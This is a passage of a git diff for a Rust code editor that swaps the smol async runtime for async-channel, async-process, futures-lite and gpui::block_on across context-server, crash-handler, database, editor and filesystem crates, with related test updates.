serde_json.workspace = true -smol.workspace = true +async-lock.workspace = true thiserror.workspace = true yawc.workspace = true diff --git a/crates/cloud_api_client/src/llm_token.rs b/crates/cloud_api_client/src/llm_token.rs index 711e0d51b89bf3..662c88ab03064b 100644 --- a/crates/cloud_api_client/src/llm_token.rs +++ b/crates/cloud_api_client/src/llm_token.rs @@ -1,7 +1,7 @@ use std::sync::Arc; +use async_lock::{RwLock, RwLockUpgradableReadGuard, RwLockWriteGuard}; use cloud_api_types::OrganizationId; -use smol::lock::{RwLock, RwLockUpgradableReadGuard, RwLockWriteGuard}; use crate::{ClientApiError, CloudApiClient}; diff --git a/crates/collab/Cargo.toml b/crates/collab/Cargo.toml index 0703d88a2c0f2f..f96b71c380ca54 100644 --- a/crates/collab/Cargo.toml +++ b/crates/collab/Cargo.toml @@ -76,6 +76,7 @@ uuid.workspace = true [dev-dependencies] agent = { workspace = true, features = ["test-support"] } async-trait.workspace = true +async-channel.workspace = true buffer_diff.workspace = true call = { workspace = true, features = ["test-support"] } diff --git a/crates/collab/tests/integration/editor_tests.rs b/crates/collab/tests/integration/editor_tests.rs index 4eca02280ebe15..2c723a833f38a1 100644 --- a/crates/collab/tests/integration/editor_tests.rs +++ b/crates/collab/tests/integration/editor_tests.rs @@ -2739,9 +2739,9 @@ async fn test_lsp_pull_diagnostics( let closure_workspace_diagnostics_pulls_result_ids = workspace_diagnostics_pulls_result_ids.clone(); let (workspace_diagnostic_cancel_tx, closure_workspace_diagnostic_cancel_rx) = - smol::channel::bounded::<()>(1); + async_channel::bounded::<()>(1); let (closure_workspace_diagnostic_received_tx, workspace_diagnostic_received_rx) = - smol::channel::bounded::<()>(1); + async_channel::bounded::<()>(1); let capabilities = lsp::ServerCapabilities { diagnostic_provider: Some(lsp::DiagnosticServerCapabilities::Options( diff --git a/crates/context_server/Cargo.toml b/crates/context_server/Cargo.toml index 
dea98bd69e0c28..3a51accb7805c7 100644 --- a/crates/context_server/Cargo.toml +++ b/crates/context_server/Cargo.toml @@ -16,10 +16,13 @@ test-support = ["gpui/test-support"] [dependencies] anyhow.workspace = true +async-channel.workspace = true +async-process.workspace = true async-trait.workspace = true base64.workspace = true collections.workspace = true futures.workspace = true +futures-lite.workspace = true gpui.workspace = true http_client = { workspace = true, features = ["test-support"] } log.workspace = true @@ -33,7 +36,6 @@ serde.workspace = true settings.workspace = true sha2.workspace = true slotmap.workspace = true -smol.workspace = true tempfile.workspace = true tiny_http.workspace = true url = { workspace = true, features = ["serde"] } @@ -41,3 +43,4 @@ util.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } +pollster.workspace = true diff --git a/crates/context_server/src/client.rs b/crates/context_server/src/client.rs index 974c25d7297719..676baef97326b4 100644 --- a/crates/context_server/src/client.rs +++ b/crates/context_server/src/client.rs @@ -1,13 +1,13 @@ use anyhow::{Context as _, Result, anyhow}; use collections::HashMap; use futures::{FutureExt, StreamExt, channel::oneshot, future, select}; +use futures_lite::future::yield_now; use gpui::{AppContext as _, AsyncApp, BackgroundExecutor, Task}; use parking_lot::Mutex; use postage::barrier; use serde::{Deserialize, Serialize, de::DeserializeOwned}; use serde_json::{Value, value::RawValue}; use slotmap::SlotMap; -use smol::channel; use std::{ fmt, path::PathBuf, @@ -49,7 +49,7 @@ pub enum RequestId { pub(crate) struct Client { server_id: ContextServerId, next_id: AtomicI32, - outbound_tx: channel::Sender, + outbound_tx: async_channel::Sender, name: Arc, subscription_set: Arc>, response_handlers: Arc>>>, @@ -197,7 +197,7 @@ impl Client { request_timeout: Option, cx: AsyncApp, ) -> Result { - let (outbound_tx, outbound_rx) = channel::unbounded::(); + let 
(outbound_tx, outbound_rx) = async_channel::unbounded::(); let (output_done_tx, output_done_rx) = barrier::channel(); let subscription_set = Arc::new(Mutex::new(NotificationSubscriptionSet::default())); @@ -304,7 +304,7 @@ impl Client { } } - smol::future::yield_now().await; + yield_now().await; Ok(()) } @@ -324,7 +324,7 @@ impl Client { /// writes them to the server's stdin, and manages the lifecycle of response handlers. async fn handle_output( transport: Arc, - outbound_rx: channel::Receiver, + outbound_rx: async_channel::Receiver, output_done_tx: barrier::Sender, response_handlers: Arc>>>, last_transport_error: Arc>>, diff --git a/crates/context_server/src/listener.rs b/crates/context_server/src/listener.rs index ad70c6d32e1ef6..2e395e493cc98a 100644 --- a/crates/context_server/src/listener.rs +++ b/crates/context_server/src/listener.rs @@ -1,6 +1,8 @@ use ::serde::{Deserialize, Serialize}; use anyhow::{Context as _, Result}; use collections::HashMap; +use futures::AsyncReadExt; +use futures::stream::StreamExt; use futures::{ AsyncBufReadExt, AsyncRead, AsyncWrite, AsyncWriteExt, FutureExt, channel::mpsc::{UnboundedReceiver, UnboundedSender, unbounded}, @@ -12,7 +14,6 @@ use net::async_net::{UnixListener, UnixStream}; use schemars::JsonSchema; use serde::de::DeserializeOwned; use serde_json::{json, value::RawValue}; -use smol::stream::StreamExt; use std::{ any::TypeId, cell::RefCell, @@ -201,7 +202,7 @@ impl McpServer { handlers: Rc>>, cx: &mut AsyncApp, ) { - let (read, write) = smol::io::split(stream); + let (read, write) = stream.split(); let (incoming_tx, mut incoming_rx) = unbounded(); let (outgoing_tx, outgoing_rx) = unbounded(); diff --git a/crates/context_server/src/oauth.rs b/crates/context_server/src/oauth.rs index 1a314de2fca9b9..de6b7d50e8a020 100644 --- a/crates/context_server/src/oauth.rs +++ b/crates/context_server/src/oauth.rs @@ -1962,7 +1962,7 @@ mod tests { #[test] fn test_fetch_protected_resource_metadata() { - smol::block_on(async { + 
gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2008,7 +2008,7 @@ mod tests { #[test] fn test_fetch_protected_resource_metadata_prefers_www_authenticate_url() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2046,7 +2046,7 @@ mod tests { #[test] fn test_fetch_protected_resource_metadata_rejects_cross_origin_url() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2089,7 +2089,7 @@ mod tests { #[test] fn test_fetch_auth_server_metadata() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2134,7 +2134,7 @@ mod tests { #[test] fn test_fetch_auth_server_metadata_falls_back_to_oidc() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2167,7 +2167,7 @@ mod tests { #[test] fn test_fetch_auth_server_metadata_rejects_issuer_mismatch() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2205,7 +2205,7 @@ mod tests { #[test] fn test_full_discover_with_cimd() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2257,7 +2257,7 @@ mod tests { #[test] fn test_full_discover_with_dcr_fallback() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2320,7 +2320,7 @@ mod tests { #[test] fn test_discover_fails_without_pkce_support() { - smol::block_on(async { + gpui::block_on(async { let client = 
make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2370,7 +2370,7 @@ mod tests { #[test] fn test_exchange_code_success() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2420,7 +2420,7 @@ mod tests { #[test] fn test_refresh_tokens_success() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|req| { Box::pin(async move { let uri = req.uri().to_string(); @@ -2459,7 +2459,7 @@ mod tests { #[test] fn test_exchange_code_failure() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|_req| { Box::pin(async move { json_response(400, r#"{"error": "invalid_grant"}"#) }) }); @@ -2494,7 +2494,7 @@ mod tests { #[test] fn test_perform_dcr() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|_req| { Box::pin(async move { json_response( @@ -2522,7 +2522,7 @@ mod tests { #[test] fn test_perform_dcr_failure() { - smol::block_on(async { + gpui::block_on(async { let client = make_fake_http_client(|_req| { Box::pin( async move { json_response(403, r#"{"error": "registration_not_allowed"}"#) }, @@ -2693,7 +2693,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_without_refresh_token_returns_false() { - smol::block_on(async { + gpui::block_on(async { let session = make_test_session("token", None, None); let provider = McpOAuthTokenProvider::new( session, @@ -2710,7 +2710,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_updates_session_and_notifies_channel() { - smol::block_on(async { + gpui::block_on(async { let session = make_test_session("old-access", Some("my-refresh-token"), None); let (tx, mut rx) = futures::channel::mpsc::unbounded(); @@ -2744,7 +2744,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_preserves_old_refresh_token_when_server_omits_it() { - smol::block_on(async { + gpui::block_on(async { let 
session = make_test_session("old-access", Some("original-refresh"), None); let (tx, mut rx) = futures::channel::mpsc::unbounded(); @@ -2776,7 +2776,7 @@ mod tests { #[test] fn test_mcp_oauth_provider_refresh_returns_false_on_http_error() { - smol::block_on(async { + gpui::block_on(async { let session = make_test_session("old-access", Some("my-refresh"), None); let http_client = make_fake_http_client(|_req| { diff --git a/crates/context_server/src/transport/http.rs b/crates/context_server/src/transport/http.rs index 3e002983b5e490..47e31c7abc7b1d 100644 --- a/crates/context_server/src/transport/http.rs +++ b/crates/context_server/src/transport/http.rs @@ -5,7 +5,6 @@ use futures::{Stream, StreamExt}; use gpui::BackgroundExecutor; use http_client::{AsyncBody, HttpClient, Request, Response, http::Method}; use parking_lot::Mutex as SyncMutex; -use smol::channel; use std::{pin::Pin, sync::Arc}; use crate::oauth::{self, OAuthTokenProvider, WwwAuthenticate}; @@ -43,10 +42,10 @@ pub struct HttpTransport { endpoint: String, session_id: Arc>>, executor: BackgroundExecutor, - response_tx: channel::Sender, - response_rx: channel::Receiver, - error_tx: channel::Sender, - error_rx: channel::Receiver, + response_tx: async_channel::Sender, + response_rx: async_channel::Receiver, + error_tx: async_channel::Sender, + error_rx: async_channel::Receiver, /// Static headers to include in every request (e.g. from server config). 
headers: HashMap, /// When set, the transport attaches `Authorization: Bearer` headers and @@ -71,8 +70,8 @@ impl HttpTransport { executor: BackgroundExecutor, token_provider: Option>, ) -> Self { - let (response_tx, response_rx) = channel::unbounded(); - let (error_tx, error_rx) = channel::unbounded(); + let (response_tx, response_rx) = async_channel::unbounded(); + let (error_tx, error_rx) = async_channel::unbounded(); Self { http_client, @@ -241,62 +240,63 @@ impl HttpTransport { let error_tx = self.error_tx.clone(); // Spawn a task to handle the SSE stream - smol::spawn(async move { - let reader = futures::io::BufReader::new(response.body_mut()); - let mut lines = futures::AsyncBufReadExt::lines(reader); - - let mut data_buffer = Vec::new(); - let mut in_message = false; - - while let Some(line_result) = lines.next().await { - match line_result { - Ok(line) => { - if line.is_empty() { - // Empty line signals end of event - if !data_buffer.is_empty() { - let message = data_buffer.join("\n"); - - // Filter out ping messages and empty data - if !message.trim().is_empty() && message != "ping" { - if let Err(e) = response_tx.send(message).await { - log::error!("Failed to send SSE message: {}", e); - break; + self.executor + .spawn(async move { + let reader = futures::io::BufReader::new(response.body_mut()); + let mut lines = futures::AsyncBufReadExt::lines(reader); + + let mut data_buffer = Vec::new(); + let mut in_message = false; + + while let Some(line_result) = lines.next().await { + match line_result { + Ok(line) => { + if line.is_empty() { + // Empty line signals end of event + if !data_buffer.is_empty() { + let message = data_buffer.join("\n"); + + // Filter out ping messages and empty data + if !message.trim().is_empty() && message != "ping" { + if let Err(e) = response_tx.send(message).await { + log::error!("Failed to send SSE message: {}", e); + break; + } } + data_buffer.clear(); } - data_buffer.clear(); - } - in_message = false; - } else if let 
Some(data) = line.strip_prefix("data: ") { - // Handle data lines - let data = data.trim(); - if !data.is_empty() { - // Check if this is a ping message - if data == "ping" { - log::trace!("Received SSE ping"); - continue; + in_message = false; + } else if let Some(data) = line.strip_prefix("data: ") { + // Handle data lines + let data = data.trim(); + if !data.is_empty() { + // Check if this is a ping message + if data == "ping" { + log::trace!("Received SSE ping"); + continue; + } + data_buffer.push(data.to_string()); + in_message = true; } - data_buffer.push(data.to_string()); - in_message = true; + } else if line.starts_with("event:") + || line.starts_with("id:") + || line.starts_with("retry:") + { + // Ignore other SSE fields + continue; + } else if in_message { + // Continuation of data + data_buffer.push(line); } - } else if line.starts_with("event:") - || line.starts_with("id:") - || line.starts_with("retry:") - { - // Ignore other SSE fields - continue; - } else if in_message { - // Continuation of data - data_buffer.push(line); } - } - Err(e) => { - let _ = error_tx.send(format!("SSE stream error: {}", e)).await; - break; + Err(e) => { + let _ = error_tx.send(format!("SSE stream error: {}", e)).await; + break; + } } } - } - }) - .detach(); + }) + .detach(); Ok(()) } diff --git a/crates/context_server/src/transport/stdio_transport.rs b/crates/context_server/src/transport/stdio_transport.rs index 0b5525a3a5af44..4bf4b77cda7f3a 100644 --- a/crates/context_server/src/transport/stdio_transport.rs +++ b/crates/context_server/src/transport/stdio_transport.rs @@ -2,14 +2,13 @@ use std::path::PathBuf; use std::pin::Pin; use anyhow::{Context as _, Result}; +use async_process::Child; use async_trait::async_trait; use futures::io::{BufReader, BufWriter}; use futures::{ AsyncBufReadExt as _, AsyncRead, AsyncWrite, AsyncWriteExt as _, Stream, StreamExt as _, }; use gpui::AsyncApp; -use smol::channel; -use smol::process::Child; use util::TryFutureExt as _; use 
util::shell::Shell; use util::shell_builder::ShellBuilder; @@ -18,9 +17,9 @@ use crate::client::ModelContextServerBinary; use crate::transport::Transport; pub struct StdioTransport { - stdout_sender: channel::Sender, - stdin_receiver: channel::Receiver, - stderr_receiver: channel::Receiver, + stdout_sender: async_channel::Sender, + stdin_receiver: async_channel::Receiver, + stderr_receiver: async_channel::Receiver, server: Child, } @@ -53,9 +52,9 @@ impl StdioTransport { let stdout = server.stdout.take().unwrap(); let stderr = server.stderr.take().unwrap(); - let (stdin_sender, stdin_receiver) = channel::unbounded::(); - let (stdout_sender, stdout_receiver) = channel::unbounded::(); - let (stderr_sender, stderr_receiver) = channel::unbounded::(); + let (stdin_sender, stdin_receiver) = async_channel::unbounded::(); + let (stdout_sender, stdout_receiver) = async_channel::unbounded::(); + let (stderr_sender, stderr_receiver) = async_channel::unbounded::(); cx.spawn(async move |_| Self::handle_output(stdin, stdout_receiver).log_err().await) .detach(); @@ -74,7 +73,7 @@ impl StdioTransport { }) } - async fn handle_input(stdin: Stdout, inbound_rx: channel::Sender) + async fn handle_input(stdin: Stdout, inbound_rx: async_channel::Sender) where Stdout: AsyncRead + Unpin + Send + 'static, { @@ -93,7 +92,7 @@ impl StdioTransport { async fn handle_output( stdin: Stdin, - outbound_rx: channel::Receiver, + outbound_rx: async_channel::Receiver, ) -> Result<()> where Stdin: AsyncWrite + Unpin + Send + 'static, @@ -110,7 +109,7 @@ impl StdioTransport { Ok(()) } - async fn handle_err(stderr: Stderr, stderr_tx: channel::Sender) + async fn handle_err(stderr: Stderr, stderr_tx: async_channel::Sender) where Stderr: AsyncRead + Unpin + Send + 'static, { diff --git a/crates/crashes/Cargo.toml b/crates/crashes/Cargo.toml index 2c13dc83c5a88c..6886e5808aa542 100644 --- a/crates/crashes/Cargo.toml +++ b/crates/crashes/Cargo.toml @@ -6,6 +6,7 @@ edition.workspace = true license = 
"GPL-3.0-or-later" [dependencies] +async-process.workspace = true cfg-if.workspace = true crash-handler.workspace = true futures.workspace = true @@ -14,7 +15,6 @@ minidumper.workspace = true parking_lot.workspace = true paths.workspace = true release_channel.workspace = true -smol.workspace = true serde.workspace = true serde_json.workspace = true system_specs.workspace = true diff --git a/crates/crashes/src/crashes.rs b/crates/crashes/src/crashes.rs index 9f18088b0ec2e7..9abe7eb8b402f3 100644 --- a/crates/crashes/src/crashes.rs +++ b/crates/crashes/src/crashes.rs @@ -8,7 +8,7 @@ use serde::{Deserialize, Serialize}; use std::mem; #[cfg(not(target_os = "windows"))] -use smol::process::Command; +use async_process::Command; use system_specs::GpuSpecs; #[cfg(target_os = "macos")] @@ -57,7 +57,11 @@ fn should_install_crash_handler() -> bool { /// The synchronous portion (signal handlers, panic hook) runs inline. /// The async keepalive task is passed to `spawn` so the caller decides /// which executor to schedule it on. -pub fn init(crash_init: InitCrashHandler, spawn: impl FnOnce(BoxFuture<'static, ()>)) { +pub fn init + Send + Sync + 'static>( + crash_init: InitCrashHandler, + spawn: impl FnOnce(BoxFuture<'static, ()>), + wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, +) { if !should_install_crash_handler() { let old_hook = panic::take_hook(); panic::set_hook(Box::new(move |info| { @@ -102,12 +106,18 @@ pub fn init(crash_init: InitCrashHandler, spawn: impl FnOnce(BoxFuture<'static, info!("crash signal handlers installed"); - spawn(Box::pin(connect_and_keepalive(crash_init, handler))); + spawn(Box::pin(connect_and_keepalive( + crash_init, handler, wait_timer, + ))); } /// Spawn the crash-handler subprocess, connect the IPC client, and run the /// keepalive ping loop. Called on a background executor by [`init`]. 
-async fn connect_and_keepalive(crash_init: InitCrashHandler, handler: CrashHandler) { +async fn connect_and_keepalive + Send + Sync + 'static>( + crash_init: InitCrashHandler, + handler: CrashHandler, + wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, +) { let exe = env::current_exe().expect("unable to find ourselves"); let zed_pid = process::id(); let socket_name = paths::temp_dir().join(format!("zed-crash-handler-{zed_pid}")); @@ -134,9 +144,7 @@ async fn connect_and_keepalive(crash_init: InitCrashHandler, handler: CrashHandl break; } elapsed += retry_frequency; - // Crash reporting is called outside of gpui in the remote server right now - #[allow(clippy::disallowed_methods)] - smol::Timer::after(retry_frequency).await; + wait_timer(retry_frequency).await; } let client = maybe_client.unwrap(); let client = Arc::new(client); @@ -157,9 +165,7 @@ async fn connect_and_keepalive(crash_init: InitCrashHandler, handler: CrashHandl loop { client.ping().ok(); - // Crash reporting is called outside of gpui in the remote server right now - #[allow(clippy::disallowed_methods)] - smol::Timer::after(Duration::from_secs(10)).await; + wait_timer(Duration::from_secs(10)).await; } } diff --git a/crates/db/Cargo.toml b/crates/db/Cargo.toml index 2fc790181a8639..36e914715bb309 100644 --- a/crates/db/Cargo.toml +++ b/crates/db/Cargo.toml @@ -23,7 +23,6 @@ inventory.workspace = true log.workspace = true paths.workspace = true release_channel.workspace = true -smol.workspace = true sqlez.workspace = true sqlez_macros.workspace = true util.workspace = true diff --git a/crates/db/src/db.rs b/crates/db/src/db.rs index da418b26e8d3cc..7cb4def94ffbf8 100644 --- a/crates/db/src/db.rs +++ b/crates/db/src/db.rs @@ -9,7 +9,6 @@ use gpui::{App, AppContext, Global}; pub use indoc::indoc; pub use inventory; pub use paths::database_dir; -pub use smol; pub use sqlez; pub use sqlez_macros; pub use uuid; @@ -19,6 +18,7 @@ use release_channel::ReleaseChannel; use sqlez::domain::Migrator; 
use sqlez::thread_safe_connection::ThreadSafeConnection; use sqlez_macros::sql; +use std::fs::create_dir_all; use std::future::Future; use std::path::{Path, PathBuf}; use std::sync::atomic::AtomicBool; @@ -62,7 +62,7 @@ impl AppDatabase { /// migrations in dependency order. pub fn new() -> Self { let db_dir = database_dir(); - let connection = smol::block_on(open_db::(db_dir, *RELEASE_CHANNEL)); + let connection = gpui::block_on(open_db::(db_dir, *RELEASE_CHANNEL)); Self(connection) } @@ -71,7 +71,7 @@ impl AppDatabase { #[cfg(any(test, feature = "test-support"))] pub fn test_new() -> Self { let name = format!("test-db-{}", uuid::Uuid::new_v4()); - let connection = smol::block_on(open_test_db::(&name)); + let connection = gpui::block_on(open_test_db::(&name)); Self(connection) } @@ -183,8 +183,7 @@ pub async fn open_db( let connection = maybe!(async { if let Some(parent) = db_path.parent() { - smol::fs::create_dir_all(parent) - .await + create_dir_all(parent) .context("Could not create db directory") .log_err()?; } @@ -397,7 +396,7 @@ mod tests { for _ in 0..10 { let tmp_path = tempdir.path().to_path_buf(); let guard = thread::spawn(move || { - let good_db = smol::block_on(open_db::( + let good_db = gpui::block_on(open_db::( tmp_path.as_path(), release_channel::ReleaseChannel::Dev, )); diff --git a/crates/db/src/kvp.rs b/crates/db/src/kvp.rs index 2dc34e5b022022..a8c4d4dfe55a92 100644 --- a/crates/db/src/kvp.rs +++ b/crates/db/src/kvp.rs @@ -243,7 +243,7 @@ impl std::ops::Deref for GlobalKeyValueStore { static GLOBAL_KEY_VALUE_STORE: std::sync::LazyLock = std::sync::LazyLock::new(|| { let db_dir = crate::database_dir(); - GlobalKeyValueStore(smol::block_on(crate::open_db::( + GlobalKeyValueStore(gpui::block_on(crate::open_db::( db_dir, crate::GlobalDbScope, ))) diff --git a/crates/edit_prediction_cli/src/main.rs b/crates/edit_prediction_cli/src/main.rs index b4951ae9d9f117..0ab16690e6c8ae 100644 --- a/crates/edit_prediction_cli/src/main.rs +++ 
b/crates/edit_prediction_cli/src/main.rs @@ -988,7 +988,7 @@ fn main() { match &command { Command::ImportBatch(import_args) => { - smol::block_on(async { + gpui::block_on(async { match import_args.provider { BatchProvider::Anthropic => { let client = anthropic_client::AnthropicClient::batch(&paths::LLM_CACHE_DB) @@ -1047,7 +1047,7 @@ fn main() { output_dir, fresh: synth_args.fresh, }; - smol::block_on(async { + gpui::block_on(async { if let Err(e) = run_synthesize(config).await { eprintln!("Error: {:?}", e); std::process::exit(1); diff --git a/crates/editor/Cargo.toml b/crates/editor/Cargo.toml index 1b2e32f19896df..e97cc68c2f956e 100644 --- a/crates/editor/Cargo.toml +++ b/crates/editor/Cargo.toml @@ -46,6 +46,7 @@ emojis.workspace = true feature_flags.workspace = true file_icons.workspace = true futures.workspace = true +futures-lite.workspace = true fuzzy.workspace = true fs.workspace = true git.workspace = true @@ -75,7 +76,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true snippet.workspace = true sum_tree.workspace = true task.workspace = true diff --git a/crates/editor/src/display_map.rs b/crates/editor/src/display_map.rs index d00376fc02039e..552eca261e9786 100644 --- a/crates/editor/src/display_map.rs +++ b/crates/editor/src/display_map.rs @@ -2582,9 +2582,9 @@ pub mod tests { }; use lsp::LanguageServerId; + use futures::stream::StreamExt; use rand::{Rng, prelude::*}; use settings::{SettingsContent, SettingsStore}; - use smol::stream::StreamExt; use std::{env, sync::Arc}; use text::PointUtf16; use theme::{LoadThemes, SyntaxTheme}; diff --git a/crates/editor/src/display_map/wrap_map.rs b/crates/editor/src/display_map/wrap_map.rs index 4ff11b1ef67971..44a4689b28564c 100644 --- a/crates/editor/src/display_map/wrap_map.rs +++ b/crates/editor/src/display_map/wrap_map.rs @@ -4,10 +4,11 @@ use super::{ fold_map::{Chunk, FoldRows}, tab_map::{self, TabEdit, TabPoint, TabSnapshot}, }; + 
+use futures_lite::future::yield_now; use gpui::{App, AppContext as _, Context, Entity, Font, LineWrapper, Pixels, Task}; use language::{LanguageAwareStyling, Point}; use multi_buffer::{MultiBufferSnapshot, RowInfo}; -use smol::future::yield_now; use std::{cmp, collections::VecDeque, mem, ops::Range, sync::LazyLock, time::Duration}; use sum_tree::{Bias, Cursor, Dimensions, SumTree}; use text::Patch; @@ -205,7 +206,7 @@ impl WrapMap { }]; if total_rows < WRAP_YIELD_ROW_INTERVAL { - let edits = smol::block_on(new_snapshot.update( + let edits = gpui::block_on(new_snapshot.update( tab_snapshot, &tab_edits, wrap_width, @@ -299,7 +300,7 @@ impl WrapMap { < WRAP_YIELD_ROW_INTERVAL && let Some((tab_snapshot, tab_edits)) = pending_edits.pop_back() { - let wrap_edits = smol::block_on(snapshot.update( + let wrap_edits = gpui::block_on(snapshot.update( tab_snapshot, &tab_edits, wrap_width, @@ -1357,10 +1358,10 @@ mod tests { display_map::{fold_map::FoldMap, inlay_map::InlayMap, tab_map::TabMap}, test::test_font, }; + use futures::stream::StreamExt; use gpui::{LineFragment, px, test::observe}; use rand::prelude::*; use settings::SettingsStore; - use smol::stream::StreamExt; use std::{cmp, env, num::NonZeroU32}; use text::Rope; use theme::LoadThemes; diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index 90d57d478712fe..24fdce51ba6379 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -1204,13 +1204,13 @@ mod tests { test::editor_lsp_test_context::EditorLspTestContext, }; use collections::BTreeSet; + use futures::stream::StreamExt; use gpui::App; use indoc::indoc; use markdown::parser::MarkdownEvent; use project::InlayId; use settings::InlayHintSettingsContent; use settings::{DelayMs, SettingsStore}; - use smol::stream::StreamExt; use std::sync::atomic; use std::sync::atomic::AtomicUsize; use text::Bias; diff --git a/crates/editor/src/lsp_ext.rs b/crates/editor/src/lsp_ext.rs index 
6f9f94bc72227f..60f0dd305ef81a 100644 --- a/crates/editor/src/lsp_ext.rs +++ b/crates/editor/src/lsp_ext.rs @@ -3,6 +3,7 @@ use std::time::Duration; use crate::Editor; use collections::{HashMap, HashSet}; +use futures_lite::FutureExt as _; use gpui::AsyncApp; use gpui::{App, Entity, Task}; use language::Buffer; @@ -14,7 +15,6 @@ use project::LocationLink; use project::Project; use project::TaskSourceKind; use project::lsp_store::lsp_ext_command::GetLspRunnables; -use smol::future::FutureExt as _; use task::ResolvedTask; use task::TaskContext; use text::BufferId; diff --git a/crates/editor/src/test/editor_lsp_test_context.rs b/crates/editor/src/test/editor_lsp_test_context.rs index d1e5270d6c76e1..854a800d7101d7 100644 --- a/crates/editor/src/test/editor_lsp_test_context.rs +++ b/crates/editor/src/test/editor_lsp_test_context.rs @@ -13,6 +13,7 @@ use serde_json::json; use crate::{Editor, ToPoint}; use collections::HashSet; use futures::Future; +use futures::stream::StreamExt; use gpui::{Context, Entity, Focusable as _, VisualTestContext, Window}; use indoc::indoc; use language::{ @@ -21,7 +22,6 @@ use language::{ }; use lsp::{notification, request}; use project::Project; -use smol::stream::StreamExt; use workspace::{AppState, MultiWorkspace, Workspace, WorkspaceHandle}; use super::editor_test_context::{AssertionContextManager, EditorTestContext}; diff --git a/crates/fs/Cargo.toml b/crates/fs/Cargo.toml index eefe2717f229d5..bf47e0ee135645 100644 --- a/crates/fs/Cargo.toml +++ b/crates/fs/Cargo.toml @@ -19,6 +19,7 @@ path = "tests/integration/main.rs" [dependencies] anyhow.workspace = true +async-channel.workspace = true async-tar.workspace = true async-trait.workspace = true collections.workspace = true diff --git a/crates/fs/src/fake_git_repo.rs b/crates/fs/src/fake_git_repo.rs index 3b34d54a6ae3a4..309b6a84a650a8 100644 --- a/crates/fs/src/fake_git_repo.rs +++ b/crates/fs/src/fake_git_repo.rs @@ -2,7 +2,9 @@ use std::path::Path; use crate::{FakeFs, FakeFsEntry, 
Fs, RemoveOptions, RenameOptions}; use anyhow::{Context as _, Result, bail}; +use async_channel::Sender; use collections::{HashMap, HashSet}; +use futures::FutureExt as _; use futures::future::{self, BoxFuture, join_all}; use git::repository::GitCommitTemplate; use git::{ @@ -24,7 +26,6 @@ use gpui::{AsyncApp, BackgroundExecutor, SharedString, Task}; use ignore::gitignore::GitignoreBuilder; use parking_lot::Mutex; use rope::Rope; -use smol::{channel::Sender, future::FutureExt as _}; use std::{path::PathBuf, sync::Arc, sync::atomic::AtomicBool}; use text::LineEnding; use util::{paths::PathStyle, rel_path::RelPath}; @@ -56,7 +57,7 @@ pub enum FakeCommitDataEntry { #[derive(Debug, Clone)] pub struct FakeGitRepositoryState { pub commit_history: Vec, - pub event_emitter: smol::channel::Sender, + pub event_emitter: async_channel::Sender, pub unmerged_paths: HashMap, pub head_contents: HashMap, pub index_contents: HashMap, @@ -78,7 +79,7 @@ pub struct FakeGitRepositoryState { } impl FakeGitRepositoryState { - pub fn new(event_emitter: smol::channel::Sender) -> Self { + pub fn new(event_emitter: async_channel::Sender) -> Self { FakeGitRepositoryState { event_emitter, head_contents: Default::default(), diff --git a/crates/fs/src/fs.rs b/crates/fs/src/fs.rs index 709b037c05a015..5b505d4d7a0acc 100644 --- a/crates/fs/src/fs.rs +++ b/crates/fs/src/fs.rs @@ -1200,7 +1200,7 @@ impl Fs for RealFs { let use_poll = requires_poll_watcher(path); let watch_path = effective_watch_path(path); - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let pending_paths: Arc>> = Default::default(); let mode = if use_poll { @@ -1449,8 +1449,8 @@ struct FakeFsState { root: FakeFsEntry, next_inode: u64, next_mtime: SystemTime, - git_event_tx: smol::channel::Sender, - event_txs: Vec<(PathBuf, smol::channel::Sender>)>, + git_event_tx: async_channel::Sender, + event_txs: Vec<(PathBuf, async_channel::Sender>)>, events_paused: bool, buffered_events: Vec, 
